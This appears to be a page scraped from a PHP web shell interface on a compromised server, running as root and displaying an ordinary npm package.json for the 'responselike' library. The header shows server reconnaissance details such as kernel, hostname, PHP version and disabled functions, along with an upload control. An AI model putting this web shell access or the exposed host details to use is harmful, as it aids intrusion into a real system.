HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux wordpress-ubuntu-s-2vcpu-4gb-fra1-01 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64
User: root (0)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/linde-ai/html/node_modules/responselike/package.json
{
  "_from": "responselike@1.0.2",
  "_id": "responselike@1.0.2",
  "_inBundle": false,
  "_integrity": "sha512-/Fpe5guzJk1gPqdJLJR5u7eG/gNY4nImjbRDaVWVMRhne55TCmj2i9Q+54PBRfatRC8v/rIiv9BN0pMd9OV5EQ==",
  "_location": "/responselike",
  "_phantomChildren": {},
  "_requested": {
    "type": "version",
    "registry": true,
    "raw": "responselike@1.0.2",
    "name": "responselike",
    "escapedName": "responselike",
    "rawSpec": "1.0.2",
    "saveSpec": null,
    "fetchSpec": "1.0.2"
  },
  "_requiredBy": [
    "/cacheable-request"
  ],
  "_resolved": "https://registry.npmjs.org/responselike/-/responselike-1.0.2.tgz",
  "_shasum": "918720ef3b631c5642be068f15ade5a46f4ba1e7",
  "_spec": "responselike@1.0.2",
  "_where": "C:\\xampp\\htdocs\\linde-ai\\html\\node_modules\\cacheable-request",
  "author": {
    "name": "lukechilds"
  },
  "bugs": {
    "url": "https://github.com/lukechilds/responselike/issues"
  },
  "bundleDependencies": false,
  "dependencies": {
    "lowercase-keys": "^1.0.0"
  },
  "deprecated": false,
  "description": "A response-like object for mocking a Node.js HTTP response stream",
  "devDependencies": {
    "ava": "^0.22.0",
    "coveralls": "^2.13.1",
    "eslint-config-xo-lukechilds": "^1.0.0",
    "get-stream": "^3.0.0",
    "nyc": "^11.1.0",
    "xo": "^0.19.0"
  },
  "homepage": "https://github.com/lukechilds/responselike#readme",
  "keywords": [
    "http",
    "https",
    "response",
    "mock",
    "request",
    "responselike"
  ],
  "license": "MIT",
  "main": "src/index.js",
  "name": "responselike",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/lukechilds/responselike.git"
  },
  "scripts": {
    "coverage": "nyc report --reporter=text-lcov | coveralls",
    "test": "xo && nyc ava"
  },
  "version": "1.0.2",
  "xo": {
    "extends": "xo-lukechilds"
  }
}